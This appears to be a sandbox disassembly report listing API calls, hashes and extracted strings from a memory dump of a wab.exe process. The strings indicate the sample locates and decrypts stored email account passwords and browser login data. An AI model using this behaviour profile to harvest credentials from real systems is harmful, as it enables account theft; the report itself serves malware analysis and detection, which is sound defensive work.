                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                    APIs
                    • memset.MSVCRT ref: 004109F7
                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                      • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                    • memset.MSVCRT ref: 00410A32
                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                    • String ID:
                    • API String ID: 3143880245-0
                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@
                    • String ID:
                    • API String ID: 1033339047-0
                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@mallocmemcpy
                    • String ID:
                    • API String ID: 3831604043-0
                    • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                    • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                    APIs
                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFontIndirect_mbscpymemset
                    • String ID: Arial
                    • API String ID: 3853255127-493054409
                    • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                    • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                    APIs
                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                    • _strcmpi.MSVCRT ref: 0040CEC3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$_strcmpimemset
                    • String ID: /stext
                    • API String ID: 520177685-3817206916
                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                    APIs
                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                    APIs
                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadProc
                    • String ID:
                    • API String ID: 145871493-0
                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                    APIs
                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile$StringWrite_itoamemset
                    • String ID:
                    • API String ID: 4165544737-0
                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                    APIs
                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                    APIs
                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                    APIs
                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                    APIs
                    • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: EnumNamesResource
                    • String ID:
                    • API String ID: 3334572018-0
                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                    APIs
                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                    APIs
                    • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                    APIs
                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                    • API String ID: 2238633743-192783356
                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString_mbscmpstrlen
                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                    • API String ID: 3963849919-1658304561
                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID: (yE$(yE$(yE
                    • API String ID: 1865533344-362086290
                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                    APIs
                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                    • memset.MSVCRT ref: 0040E5B8
                    • memset.MSVCRT ref: 0040E5CD
                    • _mbscpy.MSVCRT ref: 0040E634
                    • _mbscpy.MSVCRT ref: 0040E64A
                    • _mbscpy.MSVCRT ref: 0040E660
                    • _mbscpy.MSVCRT ref: 0040E676
                    • _mbscpy.MSVCRT ref: 0040E68C
                    • _mbscpy.MSVCRT ref: 0040E69F
                    • memset.MSVCRT ref: 0040E6B5
                    • memset.MSVCRT ref: 0040E6CC
                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                      • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                    • memset.MSVCRT ref: 0040E736
                    • memset.MSVCRT ref: 0040E74F
                    • sprintf.MSVCRT ref: 0040E76D
                    • sprintf.MSVCRT ref: 0040E788
                    • _strcmpi.MSVCRT ref: 0040E79E
                    • _strcmpi.MSVCRT ref: 0040E7B7
                    • _strcmpi.MSVCRT ref: 0040E7D3
                    • memset.MSVCRT ref: 0040E858
                    • sprintf.MSVCRT ref: 0040E873
                    • _strcmpi.MSVCRT ref: 0040E889
                    • _strcmpi.MSVCRT ref: 0040E8A5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                    • API String ID: 4171719235-3943159138
                    • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                    • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                    • GetWindowRect.USER32(?,?), ref: 00410487
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                    • GetDC.USER32 ref: 004104E2
                    • strlen.MSVCRT ref: 00410522
                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                    • ReleaseDC.USER32(?,?), ref: 00410580
                    • sprintf.MSVCRT ref: 00410640
                    • SetWindowTextA.USER32(?,?), ref: 00410654
                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                    • GetClientRect.USER32(?,?), ref: 004106DD
                    • GetWindowRect.USER32(?,?), ref: 004106E7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                    • GetClientRect.USER32(?,?), ref: 00410737
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                    • String ID: %s:$EDIT$STATIC
                    • API String ID: 1703216249-3046471546
                    • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                    • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                    APIs
                    • memset.MSVCRT ref: 004024F5
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • _mbscpy.MSVCRT ref: 00402533
                    • _mbscpy.MSVCRT ref: 004025FD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$QueryValuememset
                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                    • API String ID: 168965057-606283353
                    • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                    • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                    APIs
                    • memset.MSVCRT ref: 00402869
                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                    • _mbscpy.MSVCRT ref: 004028A3
                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                    • _mbscpy.MSVCRT ref: 0040297B
                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                    • API String ID: 1497257669-167382505
                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                    APIs
                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                    • LoadCursorA.USER32(00000067), ref: 0040115F
                    • SetCursor.USER32(00000000,?,?), ref: 00401166
